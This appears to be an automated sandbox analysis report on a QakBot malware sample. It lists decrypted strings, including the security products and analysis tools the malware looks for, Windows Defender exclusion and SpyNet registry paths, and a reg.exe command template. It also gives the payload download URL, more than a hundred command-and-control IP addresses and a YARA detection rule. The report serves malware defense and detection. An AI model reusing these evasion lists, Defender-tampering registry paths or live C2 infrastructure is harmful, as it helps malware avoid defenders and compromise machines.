Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\wextract.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_DiskDrive
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: vkise.exe;isesrv.exe;cmdagent.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: System32
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Name
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\WerFault.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: WRSA.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: c:\\
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SpyNetReporting
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: FALSE
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: aswhookx.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Packages
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SonicWallClientProtectionService.exe;SWDash.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: application/x-shockwave-flash
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: RepUx.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\mspaint.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Winsta0
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\wermgr.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: avp.exe;kavtray.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: root\SecurityCenter2
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: MsMpEng.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: userenv.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: csc_ui.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: \\.\pipe\
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: pstorec.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: NTUSER.DAT
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: from
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\sethc.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: netapi32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\Utilman.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: gdi32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: setupapi.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SELECT * FROM Win32_Processor
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: iphlpapi.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Caption
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: CrAmTray.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_ComputerSystem
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: user32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: xagtnotif.exe;AppUIMonitor.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\dxdiag.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: \sf2.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\grpconv.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: egui.exe;ekrn.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Software\Microsoft
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %S.%06d
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: bcrypt.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SELECT * FROM AntiVirusProduct
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\SndVol.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\explorer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\Utilman.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: wtsapi32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\xwizard.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: shell32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: TRUE
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_Bios
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SELECT * FROM Win32_OperatingSystem
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\mobsync.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: c:\hiberfil.sysss
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: */*
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: abcdefghijklmnopqrstuvwxyz
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ByteFence.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: type=0x%04X
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: snxhk_border_mywnd
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ROOT\CIMV2
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: https
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: fshoster32.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: kernelbase.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: regsvr32.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %s\system32\
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_Process
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: rundll32.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: LOCALAPPDATA
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: cmd.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: APPDATA
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: select
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: .exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: mcshield.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: advapi32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ws2_32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: .cfg
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_Product
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: WQL
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: wininet.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: LastBootUpTime
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: S:(ML;;NW;;;LW)
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: urlmon.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Create
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_PnPEntity
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\grpconv.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Initializing database...
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\SearchIndexer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: winsta0\default
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: .dat
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: WBJ_IGNORE
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: next
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\AtBroker.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: wpcap.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\sethc.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: image/pjpeg
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: fmon.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: bdagent.exe;vsserv.exe;vsservppl.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\SndVol.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: vbs
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: aswhooka.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SysWOW64
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\mspaint.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: mpr.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: image/gif
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: crypt32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ntdll.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: open
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\explorer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: CSFalconService.exe;CSFalconContainer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\wextract.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\mobsync.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\SearchIndexer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
Source: unknown HTTPS traffic detected: 217.195.153.225:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 96.114.21.40:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: Binary string: ExtendScript.pdb source: rundll32.exe, 00000004.00000002.400246774.000000001006A000.00000002.00000001.01000000.00000006.sdmp, main.dll.1.dr
Source: Binary string: ExtendScript.pdb source: rundll32.exe, 00000004.00000002.400246774.000000001006A000.00000002.00000001.01000000.00000006.sdmp, main.dll.1.dr
Checks for available system drives (often done to infect USB drives)
Source: C:\Windows\System32\msiexec.exe File opened: z: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: x: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: v: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: t: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: r: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: p: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: n: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: l: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: j: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: h: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: f: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: b: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: y: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: w: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: u: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: s: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: q: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: o: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: m: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: k: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: i: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: g: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: e: Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: c: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: a: Jump to behavior

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 24.234.220.88:990
Source: Malware configuration extractor IPs: 70.28.50.223:2078
Source: Malware configuration extractor IPs: 96.56.197.26:2083
Source: Malware configuration extractor IPs: 103.123.223.133:443
Source: Malware configuration extractor IPs: 83.249.198.100:2222
Source: Malware configuration extractor IPs: 199.27.66.213:443
Source: Malware configuration extractor IPs: 90.104.151.37:2222
Source: Malware configuration extractor IPs: 94.204.202.106:443
Source: Malware configuration extractor IPs: 72.205.104.134:443
Source: Malware configuration extractor IPs: 65.95.141.84:2222
Source: Malware configuration extractor IPs: 70.28.50.223:2078
Source: Malware configuration extractor IPs: 82.131.141.209:443
Source: Malware configuration extractor IPs: 77.126.99.230:443
Source: Malware configuration extractor IPs: 71.38.155.217:443
Source: Malware configuration extractor IPs: 205.237.67.69:995
Source: Malware configuration extractor IPs: 84.215.202.8:443
Source: Malware configuration extractor IPs: 24.234.220.88:465
Source: Malware configuration extractor IPs: 76.178.148.107:2222
Source: Malware configuration extractor IPs: 116.74.163.130:443
Source: Malware configuration extractor IPs: 70.28.50.223:2087
Source: Malware configuration extractor IPs: 147.147.30.126:2222
Source: Malware configuration extractor IPs: 173.88.135.179:443
Source: Malware configuration extractor IPs: 103.140.174.20:2222
Source: Malware configuration extractor IPs: 77.86.98.236:443
Source: Malware configuration extractor IPs: 92.149.250.113:2222
Source: Malware configuration extractor IPs: 96.87.28.170:2222
Source: Malware configuration extractor IPs: 86.168.210.41:443
Source: Malware configuration extractor IPs: 176.142.207.63:443
Source: Malware configuration extractor IPs: 12.172.173.82:32101
Source: Malware configuration extractor IPs: 86.132.236.117:443
Source: Malware configuration extractor IPs: 70.50.83.216:2222
Source: Malware configuration extractor IPs: 161.142.103.187:995
Source: Malware configuration extractor IPs: 45.62.70.33:443
Source: Malware configuration extractor IPs: 12.172.173.82:465
Source: Malware configuration extractor IPs: 178.175.187.254:443
Source: Malware configuration extractor IPs: 83.110.223.61:443
Source: Malware configuration extractor IPs: 105.184.209.194:995
Source: Malware configuration extractor IPs: 41.186.88.38:443
Source: Malware configuration extractor IPs: 102.156.10.183:443
Source: Malware configuration extractor IPs: 27.109.19.90:2078
Source: Malware configuration extractor IPs: 47.205.25.170:443
Source: Malware configuration extractor IPs: 12.172.173.82:993
Source: Malware configuration extractor IPs: 76.170.252.153:995
Source: Malware configuration extractor IPs: 69.242.31.249:443
Source: Malware configuration extractor IPs: 24.234.220.88:995
Source: Malware configuration extractor IPs: 125.99.69.178:443
Source: Malware configuration extractor IPs: 79.168.224.165:2222
Source: Malware configuration extractor IPs: 75.143.236.149:443
Source: Malware configuration extractor IPs: 14.192.241.76:995
Source: Malware configuration extractor IPs: 124.122.47.148:443
Source: Malware configuration extractor IPs: 81.229.117.95:2222
Source: Malware configuration extractor IPs: 98.145.23.67:443
Source: Malware configuration extractor IPs: 114.143.176.236:443
Source: Malware configuration extractor IPs: 103.144.201.48:2078
Source: Malware configuration extractor IPs: 122.186.210.254:443
Source: Malware configuration extractor IPs: 69.160.121.6:61201
Source: Malware configuration extractor IPs: 12.172.173.82:21
Source: Malware configuration extractor IPs: 72.253.126.216:443
Source: Malware configuration extractor IPs: 75.109.111.89:443
Source: Malware configuration extractor IPs: 76.86.31.59:443
Source: Malware configuration extractor IPs: 116.120.145.170:995
Source: Malware configuration extractor IPs: 12.172.173.82:50001
Source: Malware configuration extractor IPs: 81.101.185.146:443
Source: Malware configuration extractor IPs: 201.244.108.183:995
Source: Malware configuration extractor IPs: 68.203.69.96:443
Source: Malware configuration extractor IPs: 103.139.242.6:443
Source: Malware configuration extractor IPs: 103.42.86.42:995
Source: Malware configuration extractor IPs: 85.61.165.153:2222
Source: Malware configuration extractor IPs: 76.16.49.134:443
Source: Malware configuration extractor IPs: 125.99.76.102:443
Source: Malware configuration extractor IPs: 184.182.66.109:443
Source: Malware configuration extractor IPs: 70.28.50.223:32100
Source: Malware configuration extractor IPs: 50.68.204.71:993
Source: Malware configuration extractor IPs: 85.57.212.13:3389
Source: Malware configuration extractor IPs: 41.227.190.59:443
Source: Malware configuration extractor IPs: 70.28.50.223:3389
Source: Malware configuration extractor IPs: 31.53.29.235:2222
Source: Malware configuration extractor IPs: 89.79.229.50:443
Source: Malware configuration extractor IPs: 50.68.186.195:443
Source: Malware configuration extractor IPs: 47.199.241.39:443
Source: Malware configuration extractor IPs: 93.147.235.8:443
Source: Malware configuration extractor IPs: 75.141.227.169:443
Source: Malware configuration extractor IPs: 45.243.142.31:995
Source: Malware configuration extractor IPs: 79.92.15.6:443
Source: Malware configuration extractor IPs: 85.104.105.67:443
Source: Malware configuration extractor IPs: 89.129.109.27:2222
Source: Malware configuration extractor IPs: 86.176.83.44:2222
Source: Malware configuration extractor IPs: 24.234.220.88:993
Source: Malware configuration extractor IPs: 89.32.156.5:995
Source: Malware configuration extractor IPs: 12.172.173.82:22
Source: Malware configuration extractor IPs: 103.101.203.177:443
Source: Malware configuration extractor IPs: 70.28.50.223:2083
Source: Malware configuration extractor IPs: 98.187.21.2:443
Source: Malware configuration extractor IPs: 70.49.205.198:2222
Source: Malware configuration extractor IPs: 96.56.197.26:2222
Source: Malware configuration extractor IPs: 92.9.45.20:2222
Source: Malware configuration extractor IPs: 86.195.14.72:2222
Source: Malware configuration extractor IPs: 172.115.17.50:443
Source: Malware configuration extractor IPs: 100.4.163.158:2222
Source: Malware configuration extractor IPs: 80.12.88.148:2222
Source: Malware configuration extractor IPs: 213.64.33.92:2222
Source: Malware configuration extractor IPs: 113.11.92.30:443
Source: Malware configuration extractor IPs: 78.192.109.105:2222
Source: Malware configuration extractor IPs: 47.34.30.133:443
Source: Malware configuration extractor IPs: 122.184.143.86:443
Source: Malware configuration extractor IPs: 198.2.51.242:993
Source: Malware configuration extractor IPs: 165.120.169.171:2222
Source: Malware configuration extractor IPs: 88.126.94.4:50000
Source: Malware configuration extractor IPs: 82.125.44.236:2222
Source: Malware configuration extractor IPs: 117.195.17.148:993
Source: Malware configuration extractor IPs: 147.219.4.194:443
Source: Malware configuration extractor IPs: 80.167.196.79:443
Source: Malware configuration extractor IPs: 92.154.17.149:2222
Source: Malware configuration extractor IPs: 184.181.75.148:443
Source: Malware configuration extractor IPs: 95.45.50.93:2222
Source: Malware configuration extractor IPs: 84.35.26.14:995
Source: Malware configuration extractor IPs: 201.143.215.69:443
Source: Malware configuration extractor IPs: 12.172.173.82:2087
Source: Malware configuration extractor IPs: 50.68.204.71:443
Source: Malware configuration extractor IPs: 64.121.161.102:443
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CHARTER-20115US CHARTER-20115US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 75.143.236.149 75.143.236.149
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xfinity.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xfinity.comCache-Control: no-cacheCookie: xpgn=1
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49726 -> 105.184.209.194:995
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 32
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: national[1].htm.5.dr String found in binary or memory: Find tutorials and demos\u003C\u002Fa\u003E\u003C\u002Fli\u003E\u003Cli\u003E\u003Ca rel=\"nofollow\" href=\"https:\u002F\u002Fwww.facebook.com\u002Fxfinity\"\u003EFacebook equals www.facebook.com (Facebook)
Source: wscript.exe, 00000000.00000002.392570780.000001C96BC1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.392118030.000001C96BC1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.391972717.000001C96BBE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.392048669.000001C96BBF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://%/%.msi%InstallProduct
Source: 4fa97f.rbs.1.dr String found in binary or memory: https://garokelka.com/
Source: 4fa97f.rbs.1.dr String found in binary or memory: https://garokelka.com/$
Source: wscript.exe, 00000000.00000003.392048669.000001C96BC35000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.392263721.000001C96BC35000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.392570780.000001C96BC35000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://garokelka.com/yjxcii.msi
Source: ~DF22471B5A50AA2E97.TMP.1.dr String found in binary or memory: https://garokelka.com/yjxcii.msi-825014416310365950
Source: ~DFB376DA478E956195.TMP.1.dr, inprogressinstallinfo.ipi.1.dr, ~DFBDB1CFA03CBC6FC5.TMP.1.dr, ~DF2A70DF5CEC56BF5D.TMP.1.dr, ~DF79B335FA0EB48BA5.TMP.1.dr, ~DF95BD744A4429F4FF.TMP.1.dr String found in binary or memory: https://garokelka.com/yjxcii.msi0C:
Source: wscript.exe, 00000000.00000002.392535316.000001C96BBF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.391972717.000001C96BBE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.392048669.000001C96BBF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://garokelka.com/yjxcii.msill.mui
Source: national[1].htm.5.dr String found in binary or memory: https://www.xfinity.com/learn/internet-service/acp
Source: national[1].htm.5.dr String found in binary or memory: https://www.xfinity.com/mobile/policies/broadband-disclosures
Source: national[1].htm.5.dr String found in binary or memory: https://www.xfinity.com/networkmanagement
Source: unknown DNS traffic detected: queries for: garokelka.com
Source: global traffic HTTP traffic detected: GET /yjxcii.msi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows InstallerHost: garokelka.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xfinity.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xfinity.comCache-Control: no-cacheCookie: xpgn=1
Source: unknown HTTPS traffic detected: 217.195.153.225:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 96.114.21.40:443 -> 192.168.2.5:49721 version: TLS 1.2
Yara signature match
Source: 4.2.rundll32.exe.ee0950.0.unpack, type: UNPACKEDPE Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
